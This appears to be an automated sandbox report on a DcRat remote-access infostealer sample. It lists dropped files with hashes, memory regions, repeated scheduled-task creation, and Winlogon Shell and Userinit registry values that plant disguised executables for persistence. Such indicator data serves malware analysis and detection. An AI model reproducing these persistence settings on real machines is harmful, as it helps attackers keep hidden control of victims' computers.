memory/2740-63-0x0000000000400000-0x000000000069B000-memory.dmp

C:\winNet\we9fgyC144zVOkGk.vbe

MD5 aa1a085aba94a5fc38c26b79a2217336
SHA1 f847af2aec7fd56fe8734ccb51d8027b9b4e817b
SHA256 f66e935da9738cbddac905b9b55a2cfe5003aab76863b180a28e42238cbaa545
SHA512 75f66a848dc09ea859d7ddad59f6d7cac148936340eef14c4ad6cec7d4d92cf0c32bdaf911c0d943e7c478445118852180bdaceb72d9d4aae919f99cd6538981

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe

MD5 1a3448b944b91cebda73adc5064e6286
SHA1 4f8716c6e56a675944a5f0f250947c8d45a362e1
SHA256 5b489dab912970289bd0bfb41928010990288e7a3ec8acb18f637e670c50e0e5
SHA512 b355ffb98b0744cc6a1baaff7645c862344b12cfc251a1a243da666f7d41f8eea8b6a179faaeb600ffd4b4ce51b8c3f942c0cc6bd06875a4b80440468ce63795

memory/1192-84-0x0000000000EB0000-0x0000000000F7E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

MD5 7529e4004c0fe742df146464e6aeadb0
SHA1 ae7341ee066b31de5a1a1a25851b70ced41de13f
SHA256 a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81
SHA512 d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

MD5 11fdce42422f8ed518fedf290f5bfc3c
SHA1 f18a4ad694af5ba50a7697b4cb66308454c555d9
SHA256 b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3
SHA512 4e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae

C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

MD5 3492e48fb2e9fb2bfc18658e3d8f88bd
SHA1 34cec8222aedc8baf774aa863a041a23971c7631
SHA256 c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e
SHA512 a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9

memory/2548-90-0x0000000000400000-0x0000000000CC7000-memory.dmp

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat

MD5 83a7f739f51f1acd83f143afa6ec1533
SHA1 2f653f906842f8f507d02f81550eb26a35f38acc
SHA256 5faae2c746c71afcb3dc0b9eb4fbf6087786936484f62ee08412a94c13642545
SHA512 c4487c0ca0e630ee8daf2443c290fac2d0de60b0ce36c28e6451cfd66b2b81669a87726da31d4e172d2794a0345bbe9111402486b6e28d941fb6d124be604793

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

MD5 9cf4017a8383ae846a908c79a28354bf
SHA1 adbe6a02b90147431e80fc38100de42d88dd765a
SHA256 bc7ea8011a8098690cf8976f14533fdbd5a0532818ed30365ef5412a256516f2
SHA512 490a19bdd35657a50e72f2c133c8d731cf1cccd14dc4ce9648d22f486540edd9f7448eb4d2840d52bd7601c52036572937b4c79bc32206eb98b7dc76765d1f00

memory/2980-107-0x0000000000010000-0x0000000000194000-memory.dmp

memory/2980-108-0x0000000001F80000-0x0000000001F8E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabD2DB.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarD2FD.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2980-143-0x0000000002150000-0x000000000216C000-memory.dmp

memory/2980-144-0x0000000002170000-0x0000000002178000-memory.dmp

memory/2980-145-0x000000001AB70000-0x000000001AB86000-memory.dmp

memory/2980-146-0x0000000002180000-0x0000000002190000-memory.dmp

memory/2980-147-0x000000001AB90000-0x000000001AB9E000-memory.dmp

memory/2980-148-0x000000001ABA0000-0x000000001ABAE000-memory.dmp

memory/2980-149-0x000000001AD10000-0x000000001AD1A000-memory.dmp

memory/2980-150-0x000000001AD20000-0x000000001AD2C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JHZWYTZHFZCJ2CRAQJTE.temp

MD5 878de9f0d760d6de1c9c24b66a45db9d
SHA1 06f1484e0bf6173632d5fd745f4adf92c90c00dd
SHA256 79683ea935b994dc717de82a0971c7c4c2568aba3cb4ca60bc5d6c1b4b126aa8
SHA512 b10c662949b11d952674c41ea949341d2344c0f8938d5d6522a7ec6789c0142e0b10aec07a61ca17572cd4fef4ea4e59a9909513c82a21493eefdbb29b19b8e8

memory/848-187-0x0000000000CD0000-0x0000000000E54000-memory.dmp

memory/1952-208-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

memory/912-207-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

MD5 0e4e9aa41d24221b29b19ba96c1a64d0
SHA1 231ade3d5a586c0eb4441c8dbfe9007dc26b2872
SHA256 5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d
SHA512 e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2efb2df4b7748e1d6c56d5b6215bdad5
SHA1 c4582691e9ff4969b93fe573b856a49fe250bbcb
SHA256 4832361a704c948acb8e15a702f0c7f5a0ef3e63fe822e1c503f9016519844a5
SHA512 39e6f01810a6692af891bd3675927a820419834e45bc244601cc9b52a01c7d3e869a9518612ee8d37fcd2c681392f910566e0bacdeb628dd8c252f46b05b61b0

memory/1720-332-0x000007FEF2790000-0x000007FEF27B2000-memory.dmp

memory/2312-331-0x000007FEF2790000-0x000007FEF27B2000-memory.dmp

memory/1228-346-0x00000000001D0000-0x00000000003F1000-memory.dmp

memory/1228-347-0x000000001B430000-0x000000001B650000-memory.dmp

memory/2756-355-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

memory/2756-354-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

memory/2756-358-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2100-364-0x0000000001F30000-0x0000000001F38000-memory.dmp

memory/2100-363-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/2100-367-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2376-368-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2448-372-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2712-369-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1948-376-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2976-377-0x0000000001140000-0x00000000012D6000-memory.dmp

C:\winNet\WerFault.exe

MD5 e41ef428aaa4841f258a38dc1cc305ef
SHA1 edf3a17831e013b74479e2e635b8cf0c1b3787ce
SHA256 6c02076f8f42678e0576a71ff170ed84b203a0e5e9a31bda9aed912822f25995
SHA512 a92a30077601aaf34a05ceaab5738ad2aa585498868bb6b675dd43d332c46424c859ed19cf0159b04fcf7b4da3b773e37ca064e8975a43964cc6a654661f46bd

memory/2976-393-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2840-394-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2596-420-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1972-419-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2372-427-0x0000000000450000-0x000000000045C000-memory.dmp

memory/1856-428-0x0000000000ED0000-0x00000000010AA000-memory.dmp

memory/1856-430-0x0000000000310000-0x000000000031E000-memory.dmp

memory/1856-432-0x0000000000340000-0x000000000035C000-memory.dmp

memory/1856-434-0x00000000006F0000-0x0000000000708000-memory.dmp

memory/1856-436-0x0000000000320000-0x000000000032C000-memory.dmp

memory/1156-442-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2620-444-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2716-445-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1644-450-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2816-459-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1020-468-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/956-490-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2704-514-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1344-513-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2248-504-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2880-527-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2972-536-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1868-545-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1784-554-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1440-563-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2104-572-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1232-581-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1532-590-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/956-599-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1744-601-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2876-602-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2404-603-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2096-604-0x00000000012A0000-0x0000000001436000-memory.dmp

memory/1044-623-0x00000000023D0000-0x00000000023D8000-memory.dmp

memory/1044-622-0x000000001B770000-0x000000001BA52000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EQF6QU5ZSYD3HM3E3US2.temp

MD5 66675281bda70966c96b057eb343c15e
SHA1 27c70d328b682317bc7ea062859010a1e69ae873
SHA256 8065d52982827895eb621aae99ca774a9701adba2474052bb491bac0b6a6a85b
SHA512 27871647b121b011f2c54fd206007bfeda593899055d10f89432e7ae2bbe1d2a502282a95911ddaff3f21f4a52e5392d9f9b38fc39057f23a99835744b6baa73

memory/1856-612-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2920-672-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2084-677-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2268-678-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1724-679-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2780-680-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/708-681-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2040-683-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2888-682-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1044-684-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2596-696-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2592-699-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2880-700-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1692-701-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1952-703-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2440-702-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2728-704-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2228-705-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2072-706-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1804-708-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2316-707-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2640-709-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1228-711-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2748-712-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/1228-725-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

memory/2404-752-0x0000000000FB0000-0x000000000118A000-memory.dmp

memory/2348-920-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

memory/2348-921-0x0000000001F80000-0x0000000001F88000-memory.dmp

memory/2040-1100-0x00000000003D0000-0x00000000003D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\0ZXuryP2Tv

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Temp\cYTMg7h175

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\1oaokwMKbm

MD5 df8f707fde4a4e68ffee7c48f6a9b7db
SHA1 6852a7a4c463c3853643439794ed130a41d0c90b
SHA256 dc4e84de932df42fc1d78aa17751a6e21e723ae60796cd400e0b01c26d1b0449
SHA512 9c99fb4dc2c7727a75a632e28d3d18b6b4736f4484720788f9410a4567bf4aa4ed74fc6448a6a7d7cdff7bb4787e906a0f1c4e05c41ba02473e900f6aee9b7ba

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-21 20:24

Reported

2024-07-21 20:26

Platform

win10v2004-20240709-en

Max time kernel

25s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\xdwdSublime Text.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
